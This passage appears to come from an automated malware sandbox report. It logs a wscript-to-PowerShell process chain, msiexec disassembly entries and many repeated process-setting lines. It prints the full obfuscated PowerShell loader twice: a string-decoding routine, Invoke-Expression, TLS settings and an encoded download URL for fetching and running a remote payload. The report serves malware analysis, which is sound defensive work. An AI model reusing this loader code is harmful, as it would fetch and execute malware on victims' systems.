ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tankningerne249='Knaldfilmens';;$Langspytsndsejling='Evoker180';;$Kommunikeg='Sortermuligheden';;$Assuranceselskabernes='Tinglysningskontorers';;$Rosalies=$host.Name;function Recheck($Norroy){If ($Rosalies) {$Nyvurderet='Centralforeningers';$Rigsdanskens=4} for ($Langspyts=$Rigsdanskens;;$Langspyts+=5){if(!$Norroy[$Langspyts]){$Rrflangerne++;break }$deponeringsbehovet+=$Norroy[$Langspyts];$Bibliotekaren='Trepaneringers'}$deponeringsbehovet}function Vedligeholdelsesvejledningerne148($Unlyrical){ .($Modeordet) ($Unlyrical)}$Caricature58=Recheck 'PrimnPeskeT tatImp .ElekW';$Caricature58+=Recheck 'ImmoeAsteBKin CSpecLF,ogIProdEschmnlastT';$Udhngstag=Recheck 'JuleMKonjo lazSubmiLon l pralS riaU,dd/';$Udbygningsplaner=Recheck 'InstT .thl NorsFort1Genn2';$Langspytsncursion='Cont[M,chNFat eCirctSem,.Va eSTermESundR afVSm siAlteCskr E,mpopSoiloSp,ci Un nAr,etIstamSokeAtracN CosAFedtg SupEWidoRCera]For :Over:S.ersm,diESkv c A bU,arlrSkvhiKoldTDittyPrimpConfrNoblOBivuTIdoloForbcVenuo ManlTstr=Kult$TrstuRaekDSpirbkjrsYGrovG HaknSch IAymaNKontGBetoSPljePA grLPultANiggn ejre eboR';$Udhngstag+=Recheck 'Prim5Aksi.Dato0Til. Nege(MangW CepiSavonV rkdShiroA.rawBidsspoli S ieNBlasT Mei Vali1Eng,0cifr.Otio0Ista;Soci NugaWSteriFormnNapa6Unho4 Bav;Hell SmlxKede6 Beq4Smle;Over KrerS,itv .yn:Div.1Unav3 Exi1Tryp.Va o0Cond)S jo Asl,G Pine Tenc ShekIndkoUdpo/Fi,r2Mult0 Fo,1No d0Firb0 Cow1fess0Fo,u1Affa LagF onri jarS ene aunfUlykoTr,lx pr /B.it1Lept3S.ra1Macr.Dagn0';$Terrestrialism=Recheck 'SnavUR.baSCatheT.gnr Mas- KonaMarrGlagrEFin,nT.taT';$Forewings138=Recheck 'SpalhGenot .tatOutqpOvers Ch :Unde/,air/HospoAutof N n1 undx ppi.CamaiPengc okuu Ast/ ablXFl,er UdsVkorsFPa tr skaZLevno Sc,K cya/ MetSGospkT.ero ForrForgt in e indrB,na.Li erOxheaUnk.r';$Langspytsnderzoner=Recheck 'Uroe>';$Modeordet=Recheck 'Be bIUnavEUkriX';$Opmuntringstalernes='Variolous';$Orchestiidae221='\Pestersome.Lin';Vedligeholdelsesvejledningerne148 (Recheck 'Skil$Uni GBidrlHil oStv,bDeceaMiljLDall:BimemhypeeCawnL,sona H,eNOpveT Hy hUdenyL,gh=Be y$YnglEGlutNinstVA vi:D.aga FemP Stiplysadi teARverTKlokaRome+Unfo$SteaO AborQuayCSp ohTillEUn uSPe itBikuIh noiEnerDCricAL kfe ace2R dg2Anic1');Vedligeholdelsesvejledningerne148 (Recheck 'bldd$Am hgK.isLeremoE tsbSe vA,eatL ehu: SpaaA.agflaegbSkorAHuskLSp,raVarinMegac U,fS gemnCorpR Cot=Draw$SmugfRefloButirMyt.eNonpWS gbIS,lanH ndgKoliSo in1Supe3 I.c8Ins,.Af,es nhypTracLOv riHexotVill(Ch l$ CallSkulaJemmnBethgsoulsIndvpP.ogYin ptPaavsAstrn eprDTandENonprS ndzU.daOPa tn rkrEUnglRTe p)');Vedligeholdelsesvejledningerne148 (Recheck $Langspytsncursion);$Forewings138=$Afbalancsnr[0];$Hunstiks=(Recheck ' ar$SuppG SqulKlemo B gBOverA ell ,ue:PensuAfgrpPrimPIndei Negt emiyUnknn arECoshsIncosAxon=UnmanMod EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,9_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04740EC8 push eax; ret 4_2_04740F02
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04740F28 push eax; ret 4_2_04740F32
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04740F18 push eax; ret 4_2_04740F22
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04740F08 push eax; ret 4_2_04740F12
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_074B5762 pushfd ; retf 4_2_074B576F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_074B9F46 push ebp; retf 4_2_074B9F56
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_074BDA9B pushfd ; ret 4_2_074BDAA1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238E1219 push esp; iretd 7_2_238E121A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_238D2806 push ecx; ret 7_2_238D2819
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044693D push ecx; ret 9_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00451D54 push eax; ret 9_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B090 push eax; ret 10_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B090 push eax; ret 10_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00451D34 push eax; ret 10_2_00451D41
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00444E71 push ecx; ret 10_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00414060 push eax; ret 11_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00414060 push eax; ret 11_2_0041409C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00414039 push ecx; ret 11_2_00414049
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004164EB push 0000006Ah; retf 11_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00416553 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00416555 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_004047CB
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
